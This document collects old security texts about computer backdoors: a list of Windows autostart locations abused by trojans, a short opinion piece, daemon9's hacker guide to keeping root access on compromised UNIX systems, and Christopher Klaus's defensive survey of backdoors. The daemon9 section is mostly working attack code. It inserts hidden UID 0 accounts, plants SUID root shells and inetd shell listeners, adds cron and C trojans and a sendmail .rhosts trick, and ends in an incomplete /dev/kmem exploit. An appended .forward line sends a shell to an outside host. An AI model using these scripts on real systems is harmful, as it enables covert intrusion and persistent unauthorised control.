Windows executes all instructions in the Winstart batch file, located in the Windows folder. (This file is unknown to nearly all Windows users and most Windows experts, and might not exist on your system. You can easily create it, however. Note that some versions of Windows call the Windows folder the "WinNT" folder.) The full filename is WINSTART.BAT.

8. INITIALIZATION FILE.

Windows executes instructions in the "RUN=" line in the WIN.INI file, located in the Windows (or WinNT) folder.

9. INITIALIZATION FILE.

Windows executes instructions in the "LOAD=" line in the WIN.INI file, located in the Windows (or WinNT) folder.

It also runs things in shell= in System.ini or c:\windows\system.ini:

[boot]
shell=explorer.exe C:\windows\filename

The file name following explorer.exe will start whenever Windows starts.

As with Win.ini, file names might be preceeded by considerable space on such a line, to reduce the chance that they will be seen. Normally, the full path of the file will be included in this entry. If not, check the \Windows directory


10. RELAUNCHING.

Windows reruns programs that were running when Windows shut down. Windows cannot do this with most non-Microsoft programs, but it will do it easily with Internet Explorer and with Windows Explorer, the file-and-folder manager built into Windows. If you have Internet Explorer open when you shut Windows down, Windows will reopen IE with the same page open when you boot up again. (If this does not happen on your Windows PC, someone has turned that feature off. Use Tweak UI, the free Microsoft Windows user interface manager, to reactivate "Remember Explorer settings," or whatever it is called in your version of Windows.)

11. TASK SCHEDULER.

Windows executes autorun instructions in the Windows Task Scheduler (or any other scheduler that supplements or replaces the Task Scheduler). The Task Scheduler is an official part of all Windows versions except the first version of Windows 95, but is included in Windows 95 if the Microsoft Plus Pack was installed.

12. SECONDARY INSTRUCTIONS.

Programs that Windows launches at startup are free to launch separate programs on their own. Technically, these are not programs that Windows launches, but they are often indistinguishable from ordinary auto-running programs if they are launched right after their "parent" programs run.

13. C:\EXPLORER.EXE METHOD.

C:\Explorer.exe

Windows loads explorer.exe (typically located in the Windows directory)during the boot process. However, if c:\explorer.exe exists, it will be executed instead of the Windows explorer.exe. If c:\explorer.exe is corrupt, the user will effectively be locked out of their system after they reboot.

If c:\explorer.exe is a trojan, it will be executed. Unlike all other autostart methods, there is no need for any file or registry changes - the file just simply has to be named c:\explorer.exe

14. ADDITIONAL METHODS.

Additional autostart methods. The first two are used by Trojan SubSeven 2.2.

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\explorer\Usershell folders

Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
This key specifies that all applications will be executed if ICQNET Detects an Internet Connection.

[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] ="Scrap object"
"NeverShowExt"=""
This key changes your file's specified extension.



Security from a different angle

By Yvette Dubel

Post September 11th has seen a significant surge of interest in data security. It is logical to deduce that Federal, particularly military, information would under severe scrutiny. Yet, this approach flies in the face of the knowledge brought tragically to bear after the U. S. terrorist attack. While interest in hacker activities is hardly due entirely to this event. There are several lessons to be learned form this portentous impact on the collective psyche. One, the obvious is not the same as the logical. Two, there is priceless value in being able to collect clues and miraculously make the right connections. Three, the importance of knowing ones own weaknesses. And four, community awareness and action can make all the difference in nearly any circumstance. What I see as glaringly conspicuous is that next steps must transcend merely reactionary offensive measures. Exactly does all this mean in regard to IT security? It is not separate from community, and thus the human element. It is, in fact, about them. Therefore, I put forward that this is the critical and largely un-addressed aspect of IT security. Objectification of data, will not provide security in and of itself, data is valued because of its relationship to people. Consider the following in light of that statement. What is the most vulnerable and potentially valuable data? You may consider this an introduction to my slant regarding IT security. In future articles I will take this issue into relatively un-chartered territory. Your discussion and comments are of course welcomed and encouraged. I look forward to hearing from you on the discussion boards.

System Backdoor Information

By The Infinity Concept Issue II

Ok..... You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.

The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect

permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally!

After seeming endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user

privilege you have worked so hard to achieve....?


This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike.

From a hacking perspective, it is obvious what good this paper will do you. Admin's can likewise benefit from this paper. Ever

wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your

system?

This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are

ways into one.


Beforehand


Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading

now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field

format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those

robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If

you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a

nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...


The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and

skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the

admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time

to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be

looking for back doors.


The Overt


[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It

flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply

prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...



#!/bin/csh

# Inserts a UID 0 account into the middle of the passwd file.

# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.

# daemon9@netcom.com



set linecount = `wc -l /etc/passwd`

cd # Do this at home.

cp /etc/passwd ./temppass # Safety first.

echo passwd file has $linecount[1] lines.

@ linecount[1] /= 2

@ linecount[1] += 1 # we only want 2 temp files

echo Creating two files, $linecount[1] lines each \(or approximately that\).

split -$linecount[1] ./temppass # passwd string optional

echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa

cat ./xab >> ./xaa

mv ./xaa /etc/passwd

chmod 644 /etc/passwd # or whatever it was beforehand

rm ./xa* ./temppass

echo Done...



NEVER, EVER, change the root password. The reasons are obvious.



[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the

passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second

field).



[3] Leave an SUID root shell in /tmp.



#!/bin/sh

# Everyone's favorite...



cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that...

chmod 4755 /tmp/.evilnaughtyshell



Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted

to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may

notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system

specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.


The Veiled


[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some

background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the

appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical

lines look like this:



(1) (2) (3) (4) (5) (6) (7)

ftp stream tcp nowait root /usr/etc/ftpd ftpd

talk dgram udp wait root /usr/etc/ntalkd ntalkd



Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine

which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.

TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP

or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will

process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a

child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more

inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual

command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.

This is done with an 'internal' flag in fields (6) and (7).

So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it

with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd

file, etc...

For the insinuation-impaired, try this:



Open the /etc/inetd.conf in an available editor. Find the line that reads:





daytime stream tcp nowait root internal



and change it to:



daytime stream tcp nowait /bin/sh sh -i.



You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and

restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea

to do this off peak hours).



[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One

simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in

/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:



(1) (2)/(3) (4)

smtp 25/tcp mail



Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name

associated with the service. For instance, add this line to /etc/services:



evil 22/tcp evil



and this line to /etc/inetd.conf:



evil stream tcp nowait /bin/sh sh -i



Restart inetd as before.



Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,

they offer rentry from *any* account on *any* computer on the Internet.



[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's

crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this

backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have

several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.

It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,

or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab

entry has six fields:



(1) (2) (3) (4) (5) (6)

0 0 * * 1 /usr/bin/updatedb



Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week

(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,

simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the

/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not

be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your

shady intentions). Add this line to /var/spool/crontab/root:



0 0 * * * /usr/bin/trojancode



This is the shell script:



#!/bin/csh

# Is our eviluser still on the system? Let's make sure he is.

#daemon9@netcom.com



set evilflag = (`grep eviluser /etc/passwd`)





if($#evilflag == 0) then # Is he there?



set linecount = `wc -l /etc/passwd`

cd # Do this at home.

cp /etc/passwd ./temppass # Safety first.

@ linecount[1] /= 2

@ linecount[1] += 1 # we only want 2 temp files

split -$linecount[1] ./temppass # passwd string optional

echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa

cat ./xab >> ./xaa

mv ./xaa /etc/passwd

chmod 644 /etc/passwd # or whatever it was beforehand

rm ./xa* ./temppass

echo Done...

else

endif



[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the

/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root

account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a

copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).

Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything

would be ok. Add this line to root's crontab file:





29 2 * * * /bin/usr/sneakysneaky_passwd



make sure this exists:



#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky



and this is the simple shell script:



#!/bin/csh

# Install trojan /etc/passwd file for one minute

#daemon9@netcom.com



cp /etc/passwd /etc/.temppass

cp /var/spool/mail/.sneaky /etc/passwd

sleep 60

mv /etc/.temppass /etc/passwd



[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.

Make sure it runs as root. Name it something innocous. Hide it well.



/* A little trojan to create an SUID root shell, if the proper argument is

given. C code, rather than shell to hide obvious it's effects. */

/* daemon9@netcom.com */



#include



#define KEYWORD "industry3"

#define BUFFERSIZE 10



int main(argc, argv)

int argc;

char *argv[];{



int i=0;



if(argv[1]){ /* we've got an argument, is it the keyword? */



if(!(strcmp(KEYWORD,argv[1]))){



/* This is the trojan part. */

system("cp /bin/csh /bin/.swp121");

system("chown root /bin/.swp121");

system("chmod 4755 /bin/.swp121");

}

}

/* Put your possibly system specific trojan

messages here */

/* Let's look like we're doing something... */

printf("Sychronizing bitmap image records.");

/* system("ls -alR / >& /dev/null > /dev/null&"); */

for(;i<10;i++){

fprintf(stderr,".");

sleep(1);

}

printf("\nDone.\n");

return(0);

} /* End main */



[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several

users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:



"decode: "|/usr/bin/uudecode"



to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.



#! /bin/csh



# Create our .rhosts file. Note this will output to stdout.



echo "+ +" > tmpfile

/usr/bin/uuencode tmpfile /root/.rhosts



Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the

.rhosts file. For a one liner (not faked, however) do this:



%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com



You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your

choosing. Many of the previous scripts and methods can be employed here.







The Covert



[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.

The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this

case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some

general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you

are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)

Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:



get input;

if input is special hardcoded flag, spawn evil trojan;

else if input is valid, continue;

else quit with error;

...



Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.







The Esoteric



[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible

to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write

permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of

your current process, then spawn a csh, which will inherit this UID. The following program does just that.



/* If /kmem is is readable and writable, this program will change the user's

UID and GID to 0. */

/* This code originally appeared in "UNIX security: A practical tutorial"

with some modifications by daemon9@netcom.com */



#include

#include

#include

#include

#include

#include

#include



#define KEYWORD "nomenclature1"



struct user userpage;

long address(), userlocation;



int main(argc, argv, envp)

int argc;

char *argv[], *envp[];{



int count, fd;


System Backdoors Explained

Backdoors

By Christopher Klaus 8/4/97


Since the early days of intruders breaking into computers, they have tried

to develop techniques or backdoors that allow them to get back into the

system. In this paper, it will be focused on many of the common backdoors

and possible ways to check for them. Most of focus will be on Unix

backdoors with some discussion on future Windows NT backdoors. This will

describe the complexity of the issues in trying to determine the methods

that intruders use and the basis for administrators understanding on how

they might be able to stop the intruders from getting back in. When an

administrator understands how difficult it would be to stop intruder once

they are in, the appreciation of being proactive to block the intruder from

ever getting in becomes better understood. This is intended to cover many

of the popular commonly used backdoors by beginner and advanced intruders.

This is not intended to cover every possible way to create a backdoor as

the possibilities are limitless.


The backdoor for most intruders provide two or three main functions:


Be able to get back into a machine even if the administrator tries to

secure it, e.g., changing all the passwords.


Be able to get back into the machine with the least amount of visibility.

Most backdoors provide a way to avoid being logged and many times the

machine can appear to have no one online even while an intruder is using

it.


Be able to get back into the machine with the least amount of time. Most

intruders want to easily get back into the machine without having to do all

the work of exploiting a hole to gain access.


In some cases, if the intruder may think the administrator may detect any

installed backdoor, they will resort to using the vulnerability repeatedly

to get on a machine as the only backdoor. Thus not touching anything that

may tip off the administrator. Therefore in some cases, the

vulnerabilities on a machine remain the only unnoticed backdoor.


Password Cracking Backdoor


One of the first and oldest methods of intruders used to gain not only

access to a Unix machine but backdoors was to run a password cracker. This

uncovers weak passworded accounts. All these new accounts are now possible

backdoors into a machine even if the system administrator locks out the

intruder's current account. Many times, the intruder will look for unused

accounts with easy passwords and change the password to something

difficult. When the administrator looked for all the weak passworded

accounts, the accounts with modified passwords will not appear. Thus the

administrator will not be able to easily determine which accounts to lock

out.


Rhosts + + Backdoor


On networked Unix machines, services like Rsh and Rlogin used a simple

authentication method based on hostnames that appear in rhosts. A user

could easily configure which machines not to require a password to log

into. An intruder that gained access to someone's rhosts file could put a

"+ +" in the file and that would allow anyone from anywhere to log into

that account without a password. Many intruders use this method especially

when NFS is exporting home directories to the world. These accounts

become backdoors for intruders to get back into the system. Many intruders

prefer using Rsh over Rlogin because it is many times lacking any logging

capability. Many administrators check for "+ +" therefore an intruder may

actually put in a hostname and username from another compromised account on

the network, making it less obvious to spot.


Checksum and Timestamp Backdoors


Early on, many intruders replaced binaries with their own trojan versions.

Many system administrators relied on time-stamping and the system checksum

programs, e.g., Unix's sum program, to try to determine when a binary file

has been modified. Intruders have developed technology that will recreate

the same time-stamp for the trojan file as the original file. This is

accomplished by setting the system clock time back to the original file's

time and then adjusting the trojan file's time to the system clock. Once

the binary trojan file has the exact same time as the original, the system

clock is reset to the current time. The sum program relies on a CRC

checksum and is easily spoofed. Intruders have developed programs that

would modify the trojan binary to have the necessary original checksum,

thus fooling the administrators. MD5 checksums is the recommended choice

to use today by most vendors. MD5 is based on an algorithm that no one has

yet to date proven can be spoofed.


Login Backdoor


On Unix, the login program is the software that usually does the password

authentication when someone telnets to the machine. Intruders grabbed the

source code to login.c and modified it that when login compared the user's

password with the stored password, it would first check for a backdoor

password. If the user typed in the backdoor password, it would allow you to

log in regardless of what the administrator sets the passwords to. Thus

this allowed the intruder to log into any account, even root. The

password backdoor would spawn access before the user actually logged in and

appeared in utmp and wtmp. Therefore an intruder could be logged in and

have shell access without it appearing anyone is on that machine as that

account. Administrators started noticing these backdoors especially if

they did a "strings" command to find what text was in the login program.

Many times the backdoor password would show up. The intruders then

encrypted or hid the backdoor password better so it would not appear by

just doing strings. Many of the administrators can detect these backdoors

with MD5 checksums.


Telnetd Backdoor


When a user telnets to the machine, inetd service listens on the port and

receive the connection and then passes it to in.telnetd, that then runs

login. Some intruders knew the administrator was checking the login

program for tampering, so they modified in.telnetd. Within in.telnetd, it

does several checks from the user for things like what kind of terminal the

user was using. Typically, the terminal setting might be Xterm or VT100.

An intruder could backdoor it so that when the terminal was set to

"letmein", it would spawn a shell without requiring any authentication.

Intruders have backdoored some services so that any connection from a

specific source port can spawn a shell.


Services Backdoor


Almost every network service has at one time been backdoored by an

intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even

inetd, etc., have been floating around forever. There are programs that

are nothing more than a shell connected to a TCP port with maybe a backdoor

password to gain access. These programs sometimes replace a service like

uucp that never gets used or they get added to the inetd.conf file as a new

service. Administrators should be very wary of what services are running

and analyze the original services by MD5 checksums.


Cronjob backdoor


Cronjob on Unix schedules when certain programs should be run. An intruder

could add a backdoor shell program to run between 1 AM and 2 AM. So for 1

hour every night, the intruder could gain access. Intruders have also

looked at legitimate programs that typically run in cronjob and built

backdoors into those programs as well.


Library backdoors


Almost every UNIX system uses shared libraries. The shared libraries are

intended to reuse many of the same routines thus cutting down on the size

of programs. Some intruders have backdoored some of the routines like

crypt.c and _crypt.c. Programs like login.c would use the crypt() routine

and if a backdoor password was used it would spawn a shell. Therefore,

even if the administrator was checking the MD5 of the login program, it was

still spawning a backdoor routine and many administrators were not checking

the libraries as a possible source of backdoors.


One problem for many intruders was that some administrators started MD5

checksums of almost everything. One method intruders used to get around

that is to backdoor the open() and file access routines. The backdoor

routines were configured to read the original files, but execute the trojan

backdoors. Therefore, when the MD5 checksum program was reading these

files, the checksums always looked good. But when the system ran the

program, it executed the trojan version. Even the trojan library itself,

could be hidden from the MD5 checksums. One way to an administrator could

get around this backdoor was to statically link the MD5 checksum checker

and run on the system. The statically linked program does not use the

trojan shared libraries.


Kernel backdoors


The kernel on Unix is the core of how Unix works. The same method used for

libraries for bypassing MD5 checksum could be used at the kernel level,

except even a statically linked program could not tell the difference. A

good backdoored kernel is probably one of the hardest to find by

administrators, fortunately kernel backdoor scripts have not yet been

widely made available and no one knows how wide spread they really are.


File system backdoors


An intruder may want to store their loot or data on a server somewhere

without the administrator finding the files. The intruder's files can

typically contain their toolbox of exploit scripts, backdoors, sniffer

logs, copied data like email messages, source code, etc. To hide these

sometimes large files from an administrator, an intruder may patch the

files system commands like "ls", "du", and "fsck" to hide the existence of

certain directories or files. At a very low level, one intruder's backdoor

created a section on the hard drive to have a proprietary format that was

designated as "bad" sectors on the hard drive. Thus an intruder could

access those hidden files with only special tools, but to the regular

administrator, it is very difficult to determine that the marked "bad"

sectors were indeed storage area for the hidden file system.


Bootblock backdoors


In the PC world, many viruses have hid themselves within the bootblock

section and most antivirus software will check to see if the bootblock has

been altered. On Unix, most administrators do not have any software that

checks the bootblock, therefore some intruders have hidden some backdoors

in the bootblock area.


Process hiding backdoors


An intruder many times wants to hide the programs they are running. The

programs they want to hide are commonly a password cracker or a sniffer.

There are quite a few methods and here are some of the more common:


An intruder may write the program to modify its own argv[] to make it look

like another process name.


An intruder could rename the sniffer program to a legitimate service like

in.syslog and run it. Thus when an administrator does a "ps" or looks at

what is running, the standard service names appear.


An intruder could modify the library routines so that "ps" does not show

all the processes.


An intruder could patch a backdoor or program into an interrupt driven

routine so it does not appear in the process table. An example backdoor

using this technique is amod.tar.gz available on

http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html (Not There any more)


An intruder could modify the kernel to hide certain processes as well.


Rootkit


One of the most popular packages to install backdoors is rootkit. It can

easily be located using Web search engines. From the Rootkit README, here

are the typical files that get installed:


z2 - removes entries from utmp, wtmp, and lastlog.

Es - rokstar's ethernet sniffer for sun4 based kernels.

Fix - try to fake checksums, install with same dates/perms/u/g.

Sl - become root via a magic password sent to login.

Ic - modified ifconfig to remove PROMISC flag from output.

ps: - hides the processes.

Ns - modified netstat to hide connections to certain machines.

Ls - hides certain directories and files from being listed.

du5 - hides how much space is being used on your hard drive.

ls5 - hides certain files and directories from being listed.


Network traffic backdoors


Not only do intruders want to hide their tracks on the machine, but also

they want to hide their network traffic as much as possible. These network

traffic backdoors sometimes allow an intruder to gain access through a

firewall. There are many network backdoor programs that allow an intruder

to set up on a certain port number on a machine that will allow access

without ever going through the normal services. Because the traffic is

going to a non-standard network port, the administrator can overlook the

intruder's traffic. These network traffic backdoors are typically using

TCP, UDP, and ICMP, but it could be many other kinds of packets.


TCP Shell Backdoors


The intruder can set up these TCP Shell backdoors on some high port number

possibly where the firewall is not blocking that TCP port. Many times,

they will be protected with a password just so that an administrator that

connects to it, will not immediately see shell access. An administrator

can look for these connections with netstat to see what ports are listening

and where current connections are going to and from. Many times, these

backdoors allow an intruder to get past TCP Wrapper technology. These

backdoors could be run on the SMTP port, which many firewalls allow traffic

to pass for e-mail.


UDP Shell Backdoors



Administrator many times can spot a TCP connection and notice the odd

behavior, while UDP shell backdoors lack any connection so netstat would

not show an intruder accessing the Unix machine. Many firewalls have been

configured to allow UDP packets for services like DNS through. Many times,

intruders will place the UDP Shell backdoor on that port and it will be

allowed to by-pass the firewall.


ICMP Shell Backdoors


Ping is one of the most common ways to find out if a machine is alive by

sending and receiving ICMP packets. Many firewalls allow outsiders to ping

internal machines. An intruder can put data in the Ping ICMP packets and

tunnel a shell between the pinging machines. An administrator may notice a

flurry of Ping packets, but unless the administrator looks at the data in

the packets, an intruder can be unnoticed.


Encrypted Link


An administrator can set up a sniffer trying to see data appears as someone

accessing a shell, but an intruder can add encryption to the Network

traffic backdoors and it becomes almost impossible to determine what is

actually being transmitted between two machines.


Windows NT


Because Windows NT does not easily allow multiple users on a single machine

and remote access similar as Unix, it becomes harder for the intruder to

break into Windows NT, install a backdoor, and launch an attack from it.

Thus you will find more frequently network attacks that are spring boarded

from a Unix box than Windows NT. As Windows NT advances in multi-user

technologies, this may give a higher frequency of intruders who use Windows

NT to their advantage. And if this does happen, many of the concepts from

Unix backdoors can be ported to Windows NT and administrators can be ready

for the intruder. Today, there are already telnet daemons available for

Windows NT. With Network Traffic backdoors, they are very feasible for

intruders to install on Windows NT.


Solutions


As backdoor technology advances, it becomes even harder for administrators

to determine if an intruder has gotten in or if they have been successfully

locked out.


Assessment


One of the first steps in being proactive is to assess how vulnerable your

network is, thus being able to figure out what holes exist that should be

fixed. Many commercial tools exist to help scan and audit the network and

systems for vulnerabilities. Many companies could dramatically improve

their security if they only installed the security patches made freely

available by their vendors.


MD5 Baselines


One necessary component of a system scanner is MD5 checksum baselines.

This MD5 baseline should be built up before a hacker attack with clean

systems. Once a hacker is in and has installed backdoors, trying to create

a baseline after the fact could incorporate the backdoors into the

baseline. Several companies had been hacked and had backdoors installed on

their systems for many months. Overtime, all the backups of the systems

contained the backdoors. When some of these companies found out they had

a hacker, they restored a backup in hopes of removing any backdoors. The

effort was futile since they were restoring all the files, even the

backdoored ones. The binary baseline comparison needs to be done before an

attack happens.


Intrusion detection


Intrusion detection is becoming more important as organizations are hooking

up and allowing connections to some of their machines. Most of the older

intrusion detection technology was log-based events. The latest intrusion

detection system (IDS) technology is based on real-time sniffing and

network traffic security analysis. Many of the network traffic backdoors

can now easily be detected. The latest IDS technology can take a look at

the DNS UDP packets and determine if it matches the DNS protocol requests.

If the data on the DNS port does not match the DNS protocol, an alert flag

can be signaled and the data captured for further analysis. The same

principle can be applied to the data in an ICMP packet to see if it is the

normal ping data or if it is carrying encrypted shell session.


Boot from CD-ROM.


Some administrators may want to consider booting from CD-ROM thus

eliminating the possibility of an intruder installing a backdoor on the

CD-ROM. The problem with this method is the cost and time of implementing

this solution enterprise wide.


Vigilant


Because the security field is changing so fast, with new vulnerabilities

being announced daily and intruders are constantly designing new attack and

backdoor techniques, no security technology is effective without vigilance.


Be aware that no defense is foolproof, and that there is no substitute for

diligent attention.


-------------------------------------------------------------------------


you may want to add:


.forward Backdoor


On Unix machines, placing commands into the .forward file was also

a common method of regaining access. For the account ``username''

a .forward file might be constructed as follows:


\username

|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"


permutations of this method include alteration of the systems mail

aliases file (most commonly located at /etc/aliases). Note that

this is a simple permutation, the more advanced can run a simple

script from the forward file that can take arbitrary commands via

stdin (after minor preprocessing).


PS: The above method is also useful gaining access a companies

mailhub (assuming there is a shared a home directory FS on

the client and server).


> Using smrsh can effectively negate this backdoor (although it's quite

> possibly still a problem if you allow things like elm's filter or

> procmail which can run programs themselves...).


---------------------------------------------------------------------------


you may want to add this "feature" that can act as a backdoor:


when specifying a wrong uid/gid in the /etc/password file,

most login(1) implementations will fail to detect the wrong

uid/gid and atoi(3) will set uid/gid to 0, giving superuser

privileges.


example:

rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh

on Linux boxes, this will give uid 0 to user rmartin.